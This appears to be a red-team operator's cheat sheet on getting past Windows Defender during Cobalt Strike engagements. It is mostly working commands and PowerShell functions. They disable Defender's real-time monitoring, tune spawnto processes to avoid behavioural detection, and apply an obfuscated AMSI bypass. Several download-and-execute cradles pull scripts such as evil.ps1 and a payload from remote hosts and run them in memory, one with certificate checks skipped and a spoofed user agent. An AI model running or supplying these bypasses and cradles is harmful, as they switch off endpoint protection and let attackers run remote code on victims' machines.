
AV_Detection

To test AMSI, run the AMSI test sample string through Invoke-Expression. The sample is not a cmdlet; it is a string that Defender recognises. If AMSI is active, the call is blocked with "This script contains malicious content and has been blocked by your antivirus software". If PowerShell instead reports "The term 'AMSI' is not recognized as the name of a cmdlet", the string was executed rather than scanned and blocked, so either an AMSI bypass is in effect or Defender real-time protection is not enabled.

Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'

To test on-disk detections, drop the EICAR test file somewhere such as the desktop; with real-time protection on, Defender should remove it within seconds.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
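The two checks above, as an added example that is not part of the original notes: one function feeds the AMSI test sample to Invoke-Expression and classifies the error it produces, the other writes EICAR to disk and cross-checks Defender's detection history. The output path, the wait time and the summary format are assumptions.

```powershell
# Added example, not part of the original notes: exercise both test artefacts
# and report which detection layer reacted. Output path and wait time are
# assumptions; adjust for the host under test.

function Test-AmsiActive {
    # AMSI scans the string handed to Invoke-Expression. The error that comes
    # back tells you whether the scan happened and matched.
    try {
        Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386' -ErrorAction Stop
        return 'No error raised (unexpected)'
    } catch {
        $id  = $_.FullyQualifiedErrorId
        $msg = $_.Exception.Message
        if ($id -like 'ScriptContainedMaliciousContent*' -or $msg -match 'malicious content') {
            return 'Blocked: AMSI is active and Defender matched the sample'
        }
        if ($id -like 'CommandNotFoundException*' -or $msg -match 'not recognized') {
            return 'Not blocked: the string ran as a command, so AMSI is bypassed or real-time protection is off'
        }
        return "Unexpected error: $id"
    }
}

function Test-OnDiskDetection {
    param(
        [string]$Path = (Join-Path $env:USERPROFILE 'Desktop\eicar.com'),
        [int]$WaitSeconds = 10
    )
    # Assemble EICAR at run time from two halves: the whole string pasted into a
    # PowerShell session is itself scanned by AMSI and can be blocked before the
    # file is ever written, which would test the wrong layer.
    $eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD' + '-ANTIVIRUS-TEST-FILE!$H+H*'
    [System.IO.File]::WriteAllText($Path, $eicar, [System.Text.Encoding]::ASCII)
    Start-Sleep -Seconds $WaitSeconds
    $removed = -not (Test-Path -LiteralPath $Path)
    # Cross-check against Defender's own detection history for this path.
    $hit = Get-MpThreatDetection -ErrorAction SilentlyContinue |
        Where-Object { $_.Resources -like "*$Path*" } |
        Select-Object -First 1
    $threatId = $null
    if ($hit) { $threatId = $hit.ThreatID }
    if (-not $removed) { Remove-Item -LiteralPath $Path -Force -ErrorAction SilentlyContinue }
    [pscustomobject]@{
        FileRemoved   = $removed
        DefenderEvent = [bool]$hit
        ThreatId      = $threatId
    }
}

# One-line summary of each layer.
$status = Get-MpComputerStatus -ErrorAction SilentlyContinue
"Real-time protection : $($status.RealTimeProtectionEnabled)"
"AMSI test            : $(Test-AmsiActive)"
"On-disk (EICAR)      : $(Test-OnDiskDetection | ConvertTo-Json -Compress)"
```

FileRemoved false together with DefenderEvent false means real-time protection did not react at all; FileRemoved false with DefenderEvent true usually means the detection fired but the remediation action is set to something other than quarantine or remove.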

Verify if the payload is AV Safe

C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\smb_x64.svc.exe -e AMSI
C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.exe -e AMSI

One-liner to test all payloads in a directory against ThreatCheck

Get-ChildItem -Path 'C:\Payloads\' -File | ForEach-Object { Write-Output "Testing file against ThreatCheck (AMSI): $($_.Name)"; & 'C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe' -e AMSI -f $_.FullName }

Behaviour Detections (change default process for fork & run)

spawnto x64 %windir%\System32\taskhostw.exe
spawnto x86 %windir%\syswow64\dllhost.exe
spawnto x64 %windir%\System32\dllhost.exe
powerpick Get-Process -Id $pid | select ProcessName
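The powerpick check above only prints the process name. As an added example that is not part of the original notes, the function below runs through powerpick after a spawnto change and reports what a behavioural rule actually sees: the sacrificial binary, its command line, bitness, its parent, and whether the CLR has been loaded into a binary that normally never hosts it. It uses only standard cmdlets; the output field names are my own.

```powershell
# Added example, not part of the original notes. Run via:
#   powerpick Get-ForkRunContext
# after pasting the function in with powershell-import, or inline it.
function Get-ForkRunContext {
    $me     = Get-CimInstance Win32_Process -Filter "ProcessId = $PID"
    $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($me.ParentProcessId)"
    # powerpick hosts PowerShell without powershell.exe, but it still needs the
    # CLR; clr.dll inside taskhostw.exe or dllhost.exe is a strong signal.
    $clr = (Get-Process -Id $PID).Modules | Where-Object { $_.ModuleName -ieq 'clr.dll' }

    $parentName = '(none, parent already exited)'
    $parentPath = $null
    if ($parent) {
        $parentName = $parent.Name
        $parentPath = $parent.ExecutablePath
    }
    [pscustomobject]@{
        Process        = $me.Name
        ExecutablePath = $me.ExecutablePath
        CommandLine    = $me.CommandLine
        Is64Bit        = [Environment]::Is64BitProcess
        ParentProcess  = $parentName
        ParentPath     = $parentPath
        ClrLoaded      = [bool]$clr
    }
}

Get-ForkRunContext | Format-List
```

Compare the ParentProcess and CommandLine fields with what the same binary looks like when Windows starts it; the parent shown is the real one unless Beacon's ppid command has been used, in which case you see the spoofed parent, which is exactly what the EDR sees too.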

Change the default process for psexec

ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe

Disable Defender from a local PowerShell session (requires an elevated session; with Tamper Protection enabled the Set-MpPreference changes are ignored)

Get-MpPreference
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
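The same three settings as an added example (not from the original notes), but checked and reversible. When Tamper Protection is on, Set-MpPreference can return without an error while nothing changes, so the state is re-read from Get-MpComputerStatus instead of assumed, and the previous values are snapshotted so they can be restored at the end of the engagement. The function and field names are my own.

```powershell
# Added example, not part of the original notes. Needs an elevated session.
function Disable-DefenderRealtime {
    $before = Get-MpComputerStatus
    if ($before.IsTamperProtected) {
        Write-Warning 'Tamper Protection is on; these changes will most likely be ignored.'
    }
    # Snapshot the current preference values so Restore-DefenderRealtime can put them back.
    $snapshot = Get-MpPreference |
        Select-Object DisableRealtimeMonitoring, DisableIOAVProtection, DisableIntrusionPreventionSystem

    Set-MpPreference -DisableRealtimeMonitoring $true
    Set-MpPreference -DisableIOAVProtection $true
    Set-MpPreference -DisableIntrusionPreventionSystem $true

    # Do not trust the cmdlet; read the engine state back.
    $after = Get-MpComputerStatus
    [pscustomobject]@{
        TamperProtected = $before.IsTamperProtected
        RealTimeBefore  = $before.RealTimeProtectionEnabled
        RealTimeAfter   = $after.RealTimeProtectionEnabled
        IOAVBefore      = $before.IoavProtectionEnabled
        IOAVAfter       = $after.IoavProtectionEnabled
        NISBefore       = $before.NISEnabled
        NISAfter        = $after.NISEnabled
        Snapshot        = $snapshot
    }
}

function Restore-DefenderRealtime {
    param([Parameter(Mandatory)]$Snapshot)
    Set-MpPreference -DisableRealtimeMonitoring $Snapshot.DisableRealtimeMonitoring
    Set-MpPreference -DisableIOAVProtection $Snapshot.DisableIOAVProtection
    Set-MpPreference -DisableIntrusionPreventionSystem $Snapshot.DisableIntrusionPreventionSystem
}

$result = Disable-DefenderRealtime
$result | Format-List
# When done:
# Restore-DefenderRealtime -Snapshot $result.Snapshot
```

If RealTimeAfter is still True, the change was rejected and there is no point in continuing with payloads that need it off. Turning real-time protection off also writes event ID 5001 to the Microsoft-Windows-Windows Defender/Operational log, which is a common SOC alert on its own.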

AMSI BYPASS

Use an AMSI bypass with a PowerShell payload if required. Save the one-liner below to a .ps1 file, host it on Cobalt Strike and use a PowerShell IEX cradle to fetch and run it in memory before the payload, so that AMSI is already disabled in that process when the payload is loaded.

Malleable C2 amsi_disable does not apply to the Cobalt Strike jump command, so the jump methods that rely on PowerShell (psexec_psh, winrm and winrm64) fail when the payload is detected. A custom AMSI bypass has to be used to get a shell with them. To make jump work with the bypass built in, modify the Resource Kit's template.x86.ps1 (for winrm), template.x64.ps1 (for winrm64) and compress.ps1 (for psexec_psh). To learn more, read this blog: https://offensivedefence.co.uk/posts/making-amsi-jump/

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ) ; Start-Job -ScriptBlock{iex (iwr http://nickelviper.com/a -UseBasicParsing)}

Like below. Both IEX calls run in the same PowerShell process: the bypass sets amsiInitFailed for the current process only, so the payload must be fetched by that same process. Note that the trailing Start-Job in the one-liner above launches a separate background PowerShell process, where AMSI is initialised fresh; the second IEX in the command below is what loads the payload in the bypassed process.

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/amsi-bypass.ps1')) ; IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"

It can also be combined with a macro.

PowerShell execution cradles

iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
powershell.exe -nop -w hidden -c "iex (iwr http://nickelviper.com/amsi-bypass.ps1 -UseBasicParsing)"
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards

iex (iwr 'http://192.168.230.1/evil.ps1' -UseBasicParsing)   # -UseBasicParsing avoids the Internet Explorer engine dependency on Windows PowerShell 5.1
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
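The cradles above assume a direct route to the web server. As an added example that is not part of the original notes, the function below is the same WebClient cradle hardened against the two things that most often break it on a corporate host: an authenticating proxy and a self-signed certificate on the listener. The URL, the user agent string and the function name are assumptions.

```powershell
# Added example, not part of the original notes.
function Invoke-RemoteScript {
    param(
        [Parameter(Mandatory)][string]$Url,
        # Blend in with the browser's User-Agent; value is an assumption.
        [string]$UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        [switch]$SkipCertificateCheck
    )
    if ($SkipCertificateCheck) {
        # Accept any server certificate for this process; Windows PowerShell 5.1
        # has no -SkipCertificateCheck switch on Invoke-WebRequest.
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    }
    # Older .NET defaults may offer only TLS 1.0, which most listeners refuse.
    [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12

    $wc = New-Object System.Net.WebClient
    # Use the system proxy with the current user's credentials, as a browser would,
    # so the request is not dropped at an NTLM-authenticating proxy.
    $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    $wc.Headers.Add('User-Agent', $UserAgent)

    $script = $wc.DownloadString($Url)
    if ([string]::IsNullOrWhiteSpace($script)) { throw "Empty response from $Url" }
    Invoke-Expression $script
}

# Example call against the host from the cradles above (URL is an assumption).
Invoke-RemoteScript -Url 'https://webserver/payload.ps1' -SkipCertificateCheck
```

Invoke-Expression inside the function runs the fetched script in the function's scope; if that script defines functions you want to keep, dot-source the call (`. Invoke-RemoteScript -Url ...`) so they land in the caller's scope. The downloaded text still passes through AMSI on its way into Invoke-Expression, so this does not replace the bypass above.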